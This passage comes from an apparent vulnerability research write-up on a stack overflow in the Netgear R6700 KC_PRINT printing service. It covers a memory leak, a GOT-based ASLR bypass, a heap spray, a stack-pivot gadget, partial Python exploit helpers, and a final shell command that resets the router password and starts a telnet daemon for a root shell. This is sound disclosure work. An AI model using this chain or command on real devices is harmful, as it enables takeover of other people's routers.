                   is_job_name,
                   is_job_originating_user_name,
                   is_job_state,
                   is_job_state_reasons,
                   is_job_media_sheets_completed,
                   job_data);

Now, we continue to look at the vulnerable function code below. Since offset_job = 0, the first if clause is skipped (Note: skipped for now as there is a label that we will jump to later, hence why we kept it in the code below).

Then, a heap buffer to hold a response is allocated and saved in final_ptr. Then, data is copied from the prefix_ptr buffer mentioned at the beginning of the vulnerable function. Finally, it jumps to the b_write_ipp_response2 label where write_ipp_response() at 0x13210 is called. write_ipp_response() won’t be shown for brevity but its purpose is to send an HTTP response to the client socket.

Finally, the 2 heap buffers pointed to by prefix_ptr and final_ptr are freed and the function exits.

  // offset_job is an offset inside job_data[] stack buffer
  // atm we assume offset_job == 0 so we skip this condition.
  // Note we assume that due to no printing job currently existing
  // but it would be better to actually make sure all the is_xxx variables == 0 as explained above
  if ( offset_job > 0 )                         // assumed skipped for now
  {
    ...
b_write_ipp_response2:
    final_ptr[response_len++] = 3;
    // the "client_sock" is a local variable that we overwrite
    // when trying to reach the stack address. We need to brute
    // force the socket value in order to effectively send
    // us our leaked data if we really want that data back but
    // otherwise the send() will silently fail
    error = write_ipp_response(client_sock, final_ptr, response_len);

    // From testing, it is safe to use the starting .got address for the prefix_ptr 
    // and free() will ignore that address hehe
    // XXX - not sure why but if I use memset_ptr (offset inside
    //       the .got), it crashes on free() though lol
    if ( prefix_ptr )
    {
      free(prefix_ptr);
      prefix_ptr = 0;
    }

    // Freeing the final_ptr is no problem for us
    if ( final_ptr )
    {
      free(final_ptr);
      final_ptr = 0;
    }

    // this is where we get $pc control
    if ( error )
      return 0xFFFFFFFF;
    else
      return 0;
  }

  // we reach here if no job data
  final_ptr = (char *)malloc(++final_size);
  if ( final_ptr )
  {
    // prefix_ptr is a heap buffer that was allocated at the
    // beginning of this function but the pointer is stored in a
    // stack variable. We actually need to corrupt this pointer
    // as part of the stack overflow to reach the return address
    // which means we can make it copy any size from any
    // address, which results in our leak primitive
    memset(final_ptr, 0, final_size);
    copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
    response_len += copied_len;
    goto b_write_ipp_response2;
  }

  // error below / never reached
  ...
}

Exploitation

Mitigations in place

Our goal is to overwrite the return address to get $pc control but there are a few challenges here. We need to know what static addresses we can use.

Checking the ASLR settings of the kernel:

# cat /proc/sys/kernel/randomize_va_space
1

From here:

  • 0 – Disable ASLR. This setting is applied if the kernel is booted with the norandmaps boot parameter.
  • 1 – Randomize the positions of the stack, virtual dynamic shared object (VDSO) page, and shared memory regions. The base address of the data segment is located immediately after the end of the executable code segment.
  • 2 – Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment. This is the default setting.

Checking the mitigations of the KC_PRINT binary using checksec.py:

[*] '/home/cedric/test/firmware/netgear_r6700/_R6700v3-
V1.0.4.118_10.0.90.zip.extracted/
_R6700v3-V1.0.4.118_10.0.90.chk.extracted/squashfs-root/usr/bin/KC_PRINT'
    Arch:     arm-32-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x8000)

So to summarize:

  • KC_PRINT: not randomized
    • .text: read/execute
    • .data: read/write
  • Libraries: randomized
  • Heap: not randomized
  • Stack: randomized

Building a leak primitive

If we go back to the previous decompiled code we discussed, there are a few things to point out:

final_ptr = (char *)malloc(++final_size);
copied_len = memcpy_at_index(final_ptr, response_len, prefix_ptr, prefix_size);
error = write_ipp_response(client_sock, final_ptr, response_len);

The first one is that in order to overwrite the return address we first need to overwrite prefix_ptr, prefix_size and client_sock.

prefix_ptr needs to be a valid address and this address will be used to copy prefix_size bytes from it into final_ptr. Then that data will be sent back to the client socket assuming client_sock is a valid socket.

This looks like a good leak primitive since we control both prefix_ptr and prefix_size, however we still need to know our previously valid client_sock to get the data back.

However, what if we overwrite the whole stack frame containing all the local variables except we don’t overwrite the saved registers and the return address? Well it will proceed to send us data back and will exit the function as if no overflow happened. This is perfect as it allows us to brute force the client_sock value.

Moreover, by testing multiple times, we noticed that if we are the only client connecting to KC_PRINT the client_sock could be different among KC_PRINT executions. However, once KC_PRINT is started, it will keep allocating the same client_sock for every connection as long as we closed the previous connection.

This is a perfect scenario for us since it means we can initially brute force the socket value by overflowing the entire stack frame (except the saved registers and the return address) until we get an HTTP response, and KC_PRINT will never crash. Once we know that socket value, we can start leaking data. But where to point prefix_ptr to?
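The brute-force loop can be sketched as follows. This is a minimal outline under stated assumptions: find_client_sock() and the try_fd callback are hypothetical names, the candidate range is a guess, and try_fd is assumed to open a fresh connection, send an overflow that sets client_sock to the candidate value while leaving the saved registers and return address untouched, and report whether an HTTP response came back.

```python
from typing import Callable, Iterable, Optional


def find_client_sock(
    try_fd: Callable[[int], bool],
    candidates: Iterable[int] = range(3, 64),  # assumed plausible descriptor values
) -> Optional[int]:
    """Return the first candidate socket value for which a response is received."""
    for fd in candidates:
        # Each attempt is harmless to the target: a wrong guess only means
        # the response is sent to the wrong descriptor and never reaches us.
        if try_fd(fd):
            return fd
    return None


# Stand-in for the real network probe, used here only to exercise the loop.
print(find_client_sock(lambda fd: fd == 7))
```

Because the value stays stable across connections for a given KC_PRINT run, the result only needs to be found once per target process.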

Bypassing ASLR and achieving command execution

Here, there is another challenge to solve. Indeed, at the end of Response_Get_Jobs there is a call to free(prefix_ptr); before we can control $pc. So initially we thought we would need to know a heap address that is valid to pass to free().

However after testing in the debugger, we noticed that passing the Global Offset Table (GOT) address to the free() call went through without crashing. We are not sure why as we didn’t investigate for time reasons. However, this opens new opportunities. Indeed, the .got is at a static address due to KC_PRINT being compiled without PIE support. It means we can leak an imported function like memset() which is in libc.so. Then we can deduce the libc.so base address and effectively bypass the ASLR in place for libraries. We can then deduce the system() address.
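The address arithmetic behind this step is simple enough to sketch. The symbol offsets below are placeholders and not the real offsets in the router's libc.so; they would have to be read from the actual library. libc_base_from_leak() is a hypothetical helper name, and the example base address is the one visible in the memory map shown later in this post.

```python
import struct

# Placeholder offsets (assumptions, NOT taken from the real libc.so.0).
MEMSET_OFFSET = 0x00031000
SYSTEM_OFFSET = 0x0005A000


def libc_base_from_leak(leaked_addr: int, symbol_offset: int) -> int:
    """Derive the library base from one leaked function address."""
    base = leaked_addr - symbol_offset
    if base & 0xFFF:
        # A mapping base is page-aligned; anything else means a wrong offset.
        raise ValueError(f"unexpected unaligned base {base:#x}")
    return base


# The leak returns raw little-endian bytes (the target is arm-32-little).
leaked_bytes = struct.pack("<I", 0x4016E000 + MEMSET_OFFSET)  # simulated leak
memset_addr = struct.unpack("<I", leaked_bytes)[0]
base = libc_base_from_leak(memset_addr, MEMSET_OFFSET)
print(hex(base), hex(base + SYSTEM_OFFSET))
```

The page-alignment check is a cheap sanity test that the leaked value really is the expected symbol.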

Our end goal is to call system() on an arbitrary string to execute a shell command. But where to store our data? Initially we thought we could use the data on the stack but the stack is randomized so we can’t hardcode an address in our data. We could use a complicated ROP chain to build the command string to execute, but it seemed over-complicated to do in ARM (32-bit) due to ARM 32-bit alignment of instructions which makes using non-aligned instructions impossible. We also thought about changing the ARM mode to Thumb mode. But is there an even easier method?

What if we could allocate controlled data at a specific address? Then we remembered the excellent blog from Project Zero which mentioned mmap() randomization was broken on 32-bit. And in our case, we know the heap is not randomized, so what about big allocations? It turns out they are randomized but not so well.

Remember we mentioned earlier in this blog post that we can send HTTP content as big as we want and a heap buffer of that size will be allocated? Now we have a use for it. By sending HTTP content of e.g. 0x1000000 bytes (16MB), we noticed it gets allocated outside of the [heap] region and above the libraries. More specifically, we noticed by testing that an address in the range 0x401xxxxx-0x403xxxxx will always be used.

# cat /proc/317/maps
00008000-00018000 r-xp 00000000 1f:03 1429       /usr/bin/KC_PRINT          // static
00018000-00019000 rw-p 00010000 1f:03 1429       /usr/bin/KC_PRINT          // static
00019000-0001c000 rw-p 00000000 00:00 0          [heap]                     // static
4001e000-40023000 r-xp 00000000 1f:03 376        /lib/ld-uClibc.so.0        // ASLR
4002a000-4002b000 r--p 00004000 1f:03 376        /lib/ld-uClibc.so.0
4002b000-4002c000 rw-p 00005000 1f:03 376        /lib/ld-uClibc.so.0
4002f000-40030000 rw-p 00000000 00:00 0
40154000-4015f000 r-xp 00000000 1f:03 265        /lib/libpthread.so.0       // ASLR
4015f000-40166000 ---p 00000000 00:00 0
40166000-40167000 r--p 0000a000 1f:03 265        /lib/libpthread.so.0
40167000-4016c000 rw-p 0000b000 1f:03 265        /lib/libpthread.so.0
4016c000-4016e000 rw-p 00000000 00:00 0
4016e000-401d3000 r-xp 00000000 1f:03 352        /lib/libc.so.0             // ASLR
401d3000-401db000 ---p 00000000 00:00 0
401db000-401dc000 r--p 00065000 1f:03 352        /lib/libc.so.0
401dc000-401dd000 rw-p 00066000 1f:03 352        /lib/libc.so.0
401dd000-401e2000 rw-p 00000000 00:00 0                                     // Broken ASLR
bcdfd000-bce00000 rwxp 00000000 00:00 0
bcffd000-bd000000 rwxp 00000000 00:00 0
bd1fd000-bd200000 rwxp 00000000 00:00 0
bd3fd000-bd400000 rwxp 00000000 00:00 0
bd5fd000-bd600000 rwxp 00000000 00:00 0
bd7fd000-bd800000 rwxp 00000000 00:00 0
bd9fd000-bda00000 rwxp 00000000 00:00 0
bdbfd000-bdc00000 rwxp 00000000 00:00 0
bddfd000-bde00000 rwxp 00000000 00:00 0
bdffd000-be000000 rwxp 00000000 00:00 0
be1fd000-be200000 rwxp 00000000 00:00 0
be3fd000-be400000 rwxp 00000000 00:00 0
beacc000-beaed000 rw-p 00000000 00:00 0          [stack]                    // ASLR

If it gets allocated at the lowest address 0x40100008, it will end at 0x41100008. It means we can spray pages of the same data and get deterministic content at a static address, e.g. 0x41000100.
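The claim can be checked with a little arithmetic. In the sketch below, the lowest start address and the allocation size come from the text, while the highest start address is an assumption standing in for the top of the observed 0x403xxxxx range, and the page-aligned-plus-8 pattern of start addresses is inferred from the single example given. It is also assumed that the sprayed data begins at the start of the allocation.

```python
ALLOC_SIZE = 0x1000000      # 16MB HTTP content
TARGET = 0x41000100         # static address we want to rely on
PAGE = 0x1000
LOWEST_START = 0x40100008   # from the text
HIGHEST_START = 0x403FF008  # assumption: upper end of the observed range


def covers(start: int) -> bool:
    """True if an allocation beginning at `start` contains TARGET."""
    return start <= TARGET < start + ALLOC_SIZE


all_covered = all(
    covers(start) for start in range(LOWEST_START, HIGHEST_START + 1, PAGE)
)

# If every sprayed page holds the same data, the bytes seen at TARGET depend
# only on its offset within a page of the spray, which is the same for every
# start address of the form (page-aligned + 8).
page_offset = (TARGET - LOWEST_START) % PAGE
print(all_covered, hex(page_offset))
```

Under these assumptions the target address is always inside the allocation, and the data to place there goes at a fixed offset within each repeated page.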

Finally, looking at the Response_Get_Jobs function’s epilogue, we see POP {R11,PC} which means we can craft a fake R11 and use a gadget like the following to pivot our stack to a new stack where we have data we control to start doing Return Oriented Programming (ROP):

.text:000118A0                 LDR             R3, [R11,#-0x28]
.text:000118A4
.text:000118A4 loc_118A4                               ; Get_JobNode_Print_Job+7D8↑j
.text:000118A4                 MOV             R0, R3
.text:000118A8                 SUB             SP, R11, #4
.text:000118AC                 POP             {R11,PC}

So we can make R11 point to our static region at 0x41000100 and also store the command to execute at a static address in that region. Then we use the above gadget to retrieve the address of that command (also stored in that region) in order to set the first argument of system() (in r0), and then pivot the stack into that region so that it finally returns to system("any command").
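One possible layout for the fake frame follows directly from the gadget: with R11 set to the frame address, the gadget loads R0 from [R11-0x28], sets SP to R11-4, then pops R11 from [R11-4] and PC from [R11]. The Python sketch below builds such a frame. It is not the exploit used in this research: build_fake_frame() is a hypothetical helper, the system() address is a placeholder, and placing the command string right after the frame is just one convenient choice. Stack alignment and the stack space system() itself needs are not considered.

```python
import struct

GADGET_R0_SLOT = 0x28  # the gadget reads R0 from [R11 - 0x28]


def build_fake_frame(frame_addr: int, system_addr: int, command: bytes) -> bytes:
    """Return the bytes to place at frame_addr - 0x28 so the gadget calls system()."""
    cmd_addr = frame_addr + 4  # command string stored right after the PC slot
    blob = bytearray(GADGET_R0_SLOT + 4)
    struct.pack_into("<I", blob, 0, cmd_addr)                        # [R11-0x28] -> R0
    struct.pack_into("<I", blob, GADGET_R0_SLOT - 4, 0x41414141)     # [R11-4] -> R11 (filler)
    struct.pack_into("<I", blob, GADGET_R0_SLOT, system_addr)        # [R11] -> PC
    return bytes(blob) + command + b"\x00"


# Placeholder system() address; the real one is derived from the libc leak.
frame = build_fake_frame(0x41000100, 0x401C8000, b"id")
print(frame.hex())
```

After the final POP, SP points just past the PC slot, so the command string sits above the new stack pointer and is not overwritten by system()'s own stack usage.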

Obtaining a root shell

We decided to use the following command: "nvram set http_passwd=nccgroup && sleep 4 && utelnetd -d -i br0". This is very similar to the method used in the Tokyo drift paper, except that in our case we have more control: since we can execute any commands we want, we can set an arbitrary password as well as start the utelnetd process, instead of just being able to reset the HTTP password to its default value.

Finally, we use the same trick as the Tokyo drift paper and log in to the web interface to set the password again to the same value, so that utelnetd takes our new password into account and we get a remote shell on the Netgear router.
